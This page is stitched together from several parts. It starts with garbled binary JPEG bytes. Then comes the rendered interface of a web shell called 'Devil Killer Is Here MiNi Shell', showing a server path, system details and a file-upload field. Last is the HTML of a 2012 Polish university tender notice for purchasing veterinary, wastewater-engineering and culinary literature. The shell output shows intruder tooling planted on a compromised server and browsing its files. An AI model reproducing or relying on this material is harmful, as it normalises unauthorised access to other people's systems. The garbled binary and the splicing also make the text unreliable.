JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/54163-N-2012.html

<p class="kh_header"><b>Olsztyn: Sprzedaż wraz z dostawą literatury w ramach projektu Wzmocnienie potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 realizowanego przez Uniwersytet Warmińsko-Mazurski w Olsztynie nr umowy UDA-POKL.04.01.01-00-095/10-00</b><br>
<b>Numer ogłoszenia: 54163 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż wraz z dostawą literatury w ramach projektu Wzmocnienie potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 realizowanego przez Uniwersytet Warmińsko-Mazurski w Olsztynie nr umowy UDA-POKL.04.01.01-00-095/10-00.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sprzedaż wraz z dostawą literatury w ramach projektu Wzmocnienie potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 realizowanego przez Uniwersytet Warmińsko-Mazurski w Olsztynie nr umowy UDA-POKL.04.01.01-00-095/10-00
Przedmiot zamówienia został podzielony na 4 części.
Część nr 1. Literatura obcojęzyczna 
Część nr 2. Pomoce dydaktyczne - literatura
Część nr 3. Podręczniki z zakresu sztuki kulinarnej
Część nr 4. Normy
W przypadku wskazania przez Zamawiającego w opisie przedmiotu zamówienia znaków towarowych, patentów lub pochodzenia, dopuszcza się,  na podstawie art. 29 ust.3 ustawy Prawo zamówień publicznych, możliwość złożenia oferty równoważnej - zaoferowania asortymentu równoważnego do wyspecyfikowanego - 
o takich samych lub lepszych parametrach i właściwościach..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunków Zamawiający odstępuje od dokonania opisu
sposobu oceny ich spełnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do podpisania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem, pieczęcią Wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu rejestrowego oraz jej podpisem 2. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 1
do Specyfikacji Istotnych Warunków Zamówienia Formularz Ofertowy 3. Sporządzony przez Wykonawcę wg wzoru stanowiącego załącznik nr 2 do Specyfikacji Istotnych Warunków Zamówienia Formularz Cenowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający w ramach zawartej umowy przewiduje możliwość zmian dotyczących: 1.
Zmiany terminu realizacji umowy ze względu na wystąpienie okoliczności niedających się przewidzieć przed zawarciem umowy, np. działanie siły wyższej, 2. Zmiany terminu realizacji u względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć pomimo zachowania należytej staranności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych, ul. Oczapowskiego 2, pok. 311, 10-957 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 10:00, miejsce: Dział Zamówień Publicznych, ul. Oczapowskiego 2, pok. 309, 10-957 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane w ramach projektu Wzmocnienie potencjału dydaktycznego UWM w Olsztynie finansowanego ze środków Unii Europejskiej w ramach Priorytetu IV Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 realizowanego przez Uniwersytet Warmińsko-Mazurski w Olsztynie nr umowy UDA-POKL.04.01.01-00-095/10-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Literatura obcojęzyczna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Veterinary Reproduction and Obstetrics D. Noaks W.B. Saunders Company 2009, ISBN: 978-0-7020-2887-8 - 4 sztuki
2. Veterinary Genetics and Reproductive Physiology S. Long Butterworth Heinemann 2006, ISBN: 9780750688772 - 4 sztuki
3. Sheep Medicine (Ovine Clinical Medicine)R. Scott
Menson Publishing Ltd 2007, ISBN: 978-1-84076-049-1 - 4 sztuki
4. Equine Breeding Management and Artificial Insemination
J. Samper
W.B. Saunders Company 2009, ISBN: 978-1-4160-5234-0
5. Current Therapy in Equine Reproduction  J. Samper
W.B. Saunders Company 2007, ISBN 10: 0-7216-0252-5, ISBN 13: 978-0-7216-0252-3 - 4 sztuki
6. Breeding, production recording, health and evaluation of farm
J Kyntaja Wageningen Pers 2007, ISBN: 978-9-0868-6030-2 - 4 sztuki
7. Mastitis control in dairy herds R. Blowey and P. Edmondson Farming Press 2008, ISBN: 978-1-84593-550-4  -5 sztuk
8. Bovine Medicine: Diseases and Husbandry of Cattle A.H. Andrews, R. Blowey, H. Boyd, R. Eddy Wiley & Sons 2008, ISBN: 978-0-47075-239-5. - 2 sztuki
9. Herd health and production management in dairy practice A. Brand Wageningen Pers 1996, ISBN: 978-90-74134-34-7. - 4 sztuki
10. Equine Reproduction A. McKinnon, J. VossB lackwell Publishing 2011, ISBN: 978-0-8138-1971-6 - 2 sztuki
11. Blackwells Five - Minute Veterinary Consult : Equine J. Lavoie, K. Hinchcliff,  Wiley - Blackwell 2009. ISBN: 978-0-8138-1769-9 - 4 sztuki
12. Blackwells Five - Minute Veterinary Consult : Ruminant S. Haskell Wiley - Blackwell 2009, ISBN: 978-0-7817-5325-8 - 4 sztuki
13. Klinik der Reproduktionsmedizin des Hundes H.-K. Dreier Schlutersche Verlagsgesellschaft 2009, ISBN: 978-3-89993-061-0  -4 sztuki
14. Mastitis control in dairy herds R. Blowey, P. Edmondson Flaming Press 2010, ISBN: 978-18459-355-0-4 - 5 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Normy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. DWA-K3 Komentarz ATV-DVWK do A131P i do A210P: Wymiarowanie jednostopniowych oczyszczalni ścieków z osadem czynnym oraz sekwencyjnych reaktorów porcjowych SBR
ROK WYDANIA: 07/2002 FORMAT: B4 ILOŚĆ STRON: 172 - 10 sztuk
2. DWA- A 115P Odprowadzanie ścieków innych niż gospodarczo-bytowe do publicznych systemów instalacji ściekowych
ROK WYDANIA: 10/1994 FORMAT: A4 ILOŚĆ STRON: 31 - 10 sztuk
3. DWA- A 122P Podstawy wymiarowania, budowy 
i eksploatacji małych oczyszczalni ścieków z aerobowym biologicznym stopniem oczyszczania o wielkości od 50 do 500 OLM
ROK WYDANIA: 06/1991 FORMAT: A4 ILOŚĆ STRON: 12 - 10 sztuk
4. DWA- A 131P Wymiarowanie jednostopniowych oczyszczalni ścieków z osadem czynnym o wielkości ponad 5000 OLM
ROK WYDANIA: 05/2000 FORMAT: B4 ILOŚĆ STRON: 50 - 10 sztuk
5. DWA- M 209P Pomiary zdolności natleniania urządzeń napowietrzających w instalacjach osadu czynnego w czystej wodzie  i osadzie czynnym ROK WYDANIA: 06/1996 FORMAT: A4
ILOŚĆ STRON: 44  -10 sztuk
6. DWA- H 254P Ogólne kryteria oceny oczyszczalni ścieków ze szczególnymi kombinacjami lub wariantami technologicznymi o wielkości do 10 000 OLM
ROK WYDANIA: 11/1986 FORMAT: A4 ILOŚĆ STRON: 6 - 10 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Podręczniki z zakresu sztuki kulinarnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Anthelme Brillat-Savarin - Fizjologia smaku, Państwowy Instytut Wydawniczy, 2003. ISBN: 83-06-02498-2 - 1 sztuka
2. Baryłko-Pikielna Nina, Irena Matuszewska - Sensoryczne badania żywności Podstawy-Metody-Zastosowania. Wydawnictwo Naukowe PTTŻ, 2009. ISBN: 978-83-924646-9-3 - 1 sztuka
3. Gawęcki Jan, Baryłko-Pikielna Nina, Zmysły a jakość żywności i żywienia, Wydawnictwo Uniwersytet Przyrodniczy w Poznaniu,  2007. ISBN8371604483, 9788371604485 - 1 sztuka
4. Dominik Piotr, Gastronomia we współczesnym hotelu, WSE, Warszawa, 2008. ISBN: 978-83-60197-69-1 - 1 sztuka
5.  Neufert Ernst, Podręcznik projektowania architektoniczno-budowlanego, Wydawnictwo Arkady 2011, ISBN: 9788321346939 -1 sztuka
6.  Koziorowska Barbara - Projektowanie technologiczne zakładów gastronomicznych - Wydawnictwo SGGW, 1998, ISBN: 83-00-03176-6. - 1 sztuka
7. Konarzewska Małgorzata, Lada Ewa Hanna, Zielonka Barbara, Wyposażenie techniczne zakładów gastronomicznych. Wydawnictwo REA, 2010, ISBN:8371418180  -1 sztuka
8. Witkiewicz Zbigniew, Wilgocki Stanisław, Organizacja i technika pracy w zakładzie gastronomicznym  WSTiH Gdańsk. 2008.  ISBN: 978-83-89081-11-7 - 1 sztuka
9. Ambroziak Zygmunt, Produkcja piekarsko-ciastkarska (cz. 2). WSiP, Warszawa 1999. ISBN: 9788302071553 - 1 sztuka
10. Claudia Daiber   - Dekorowanie tortów. Wydawnictwo Klub dla Ciebie, ISBN: 9788374046442  -1 sztuka
10. Claudia Daiber   - Dekorowanie tortów. Wydawnictwo Klub dla Ciebie, ISBN: 9788374046442  -1 sztuka
11. Ćwierczakiewiczowa Lucyna, Kuchnia Lucyny Ćwierczakiewiczowej. Wypieki, videograf Edukacja 2006. ISBN: 83-89232-94-4 - 1 sztuka
12. Desery na każdą okazję. Wydawnictwo: Olimp Media. 2010. ISBN: 9788377070260 - 1 sztuka
13. Jean-Claude Deschaintre, Bernard Deschamps, Ciastkarstwo. Podręcznik do nauki zawodu cukiernik, Wydawnictwo Rea, 2009 , ISBN: 978-83-7544-127-7 - 1 sztuka
14.  Dojutrek Cz., A.Pietrzyk , Ciastkarstwo. Technologia. Wydawnictwo WsiP 2007, ISBN: 978-83-02-07846-0 - 1 sztuka
15. Górecka Danuta, Halina Milanówka, Ewa Superczyńska, Melania Żylińska-Kaczmarek, Technologia gastronomiczna z obsługą konsumenta (cz. 3). Wyd. Format AB, Warszawa 2006. ISBN: 83-89184-17-6 - 1 sztuka
16. Kaźmierczak Magdalena Technologie w produkcji cukierniczej. Cz.1. i 2.  Wydawnictwp REA. ISBN: 978-83-7544-361-5; ISBN: 978-83-7544-360-8 - 1 sztuka
17. Kocierz, Katarzyna Technika w produkcji cukierniczej, Wydawnictwo REA. 2011. ISBN: 9788375442977 - 1 sztuka
18. Lubczyńska Hanna, Helena Lipińska, Krystyna Jarosz,Andrzej Woźniakowski, Jolanta Kosakowska, Matylda Walewska, Vademecum Piekarza, Wydawnictwo Hussch, 2006. ISBN: 83-919549-5-1 - 1 sztuka
19. Marianne Magnier-Moreno - Ciasta i desery. Gotowanie krok po kroku. Wydawnictwo: RM. 2010. ISBN: 978-83-7243-848-5 - 1 sztuka
20. Milstein Tamara, Najlepsze ciasta świata, Wydawnictwo RM. 2009. ISBN: 9788372437761  -1 sztuka
21. Praca zbiorowa, Desery świata. Wyd. Twój Styl 2003. ISBN: 8371633343 (9788371633348) - 1 sztuka
22. Roux Michel, Ciasta pikantne i słodkie. Wyd. Bellona 2009. ISBN: 978-83-11-11512-5 - 1 sztuka
23. Lange Elisabeth , Wyśmienite ciasta serowe Wydawnictwo: Klub Dla Ciebie. 2010. ISBN: 978-83-258-0207-3 - 1 sztuka
24. Zbiór receptur ciastkarskich oraz podstawy technologii półproduktów i wyrobów Wydawnictwo HUSSCH.2002. ISBN: 83-904111-7-2 - 1 sztuka
25. Stradecka, Alina Aleksandra Chomicz - Ciasta wytrawne.  Wydawnictwo: Świat Książki, 2010. ISBN: 978-83-247-1931-0 - 1 sztuka
26. Bieńczyk M., Bońkowski W. Przewodnik wina europy 2009, Wydawnictwo Hachette Warszawa 2008. ISBN: 978-83-7448-668-2 - 1 sztuka
27. Casamayor Pierre, Wino Degustacja, wydawca Hachette Polska Sp. z o.o., 2009. ISBN: 61978829 - 1 sztuka
28. Carlos Falco, Wino. Porady Markiza z Grinon Wydawnictwo:Zysk i S-ka , Czerwiec 2006. ISBN: 83-7298-971-0 - 1 sztuka
29.  Casamayor Pierre - Wino. 80 najważniejszych pytań i odpowiedzi. Wydawnictwo: Hachette. ISBN: 978-83-7448-673-6 - 1 sztuka
30. Darbonne C. Vincent C., Harmonia smaków. Wina i potrawy, Twój styl, Warszawa 2008. ISBN: 978-83-7163-414-7 - 1 sztuka
31. Domine A. Wino, FK Olesiejuk Warszawa 2008. ISBN 978-83-7588-275-9 - 1 sztuka
32. Ewing-Mulligan Mary, Ed McCarty, Style i smaki wina Wydawnictwo Amber, Warszawa 2007. ISBN: 69932809 - 1 sztuka
33. Fischer C., Wina Leksykon Daumonta, FK Olesiejuk, Warszawa 2011. ISBN: 83-7423-498-9 - 1 sztuka
34. Halliday James, Johnson Hugh, Wino. Sztuka i Nauka Wydawnictwo Iskra , Warszawa 2008.  EAN: 9788324400782 - 1 sztuka
35. Johnson Hugh, Robinson Jancis - Wielki atlas świata win. Wydawnictwo: Buchmann,2009. ISBN: 61990180 - 1 sztuka
36. Koelliker Beat, Szkoła win, Wydawnictwo Delta, 2009. ISBN: 69457814 - 1 sztuka
37. Kriesi R. Osterwalder P. Wino. Porady dla smakoszy, Arkady Warszawa 2006. ISBN-10: 8321343260 - 1 sztuka
38. Luis Tomas , Gil Melgar - Encyklopedia wina. Wydawnictwo: Buchmann. 2009. ISBN: 978-83-61048-70-1  - 1 sztuka
39. Wolfgang Vogel,  Wino z winogron i innych owoców, Oficyna Wydawnicza Mulico Warszawa 2008. ISBN: 978-83-7073-629-3 - 1 sztuka
40. Nowak Barbara, Wichman Beverly,  Księga win, Wydawnictwo HELION. 2009. ISBN: 978-83-246-0711-2 - 1 sztuka
41. Tuire Tepponen Białe czy czerwone? O sztuce dobierania win, wydawnictwo Rea, Warszawa 2010. ISBN: 9788375442175 - 1 sztuka
42. Wawro Ewa Winnice w Polsce. Wydawnictwo: Mulico, 2011. ISBN: 978-83-7763-043-3  -1 sztuka
43. Neil Beckett, 1001 win, których warto spróbować, Wydawnictwo: Muza , 2010 - 1 sztuka
44.  Zraly Kevin  Kurs wiedzy o winie. Wydawnictwo: Explanator, 2009 ISBN: 978-83-9289-160-4   -1 sztuka
45. Bangert Elisabeth, Dekorowanie potraw. Wydawnictwo Weltbild Media (KDC), 2010,. ISBN: ISBN: 9788374047494 - 1 sztuka
46. Hobday Cara, Jo Denbury, Sekrety dekorowania potraw. Profesjonalne techniki stylizacji. Wydawnictwo Muza 2011. ISBN: 9788374959070 - 1 sztuka
47. Królik Rajmund, Księga carvingu - dekorowanie potraw oraz stołu owocami i warzywami krok po kroku. Twoje Wydawnictwo, Warszawa 2009, ISBN: 978-93-7613-069-9 - 1 sztuka
48. Pinder Polly, Dekorowanie świątecznego stołu. Wydawnictwo: RM 2009,  ISBN: 978-83-7243-554-5 - 1 sztuka
49. Praca zbiorowa, Sekrety dekorowania potraw. Wydawnictwo: Muz 2011, ISBN:
978-83-7495-907-0 - 1 sztuka
50. Rigg Annie,  Dekorowanie ciast, ciasteczek i tortów. Wydawnictwo RM 2010. ISBN: 97883724387511 - 1 sztuka
51. Szachowska-Tarkowska Joanna, Świąteczne dekoracje stołu. Wydawnictwo: Prószyński i S-ka 2005, ISBN: 83-7469-170-0 - 1 sztuka
52. Tietz Oda, Helga Florian, Dekorowanie potraw warzywami, kwiatami i owocami. Wydawnictwo Klub dla Ciebie 2009,  ISBN: 9788325800871 - 1 sztuka
53. Caprari Małgorzata, Sałatki na cztery pory roku. Wydawnictwo : Klub Dla Ciebie 2011. ISBN: 978-83-258-0361-2 - 1 sztuka
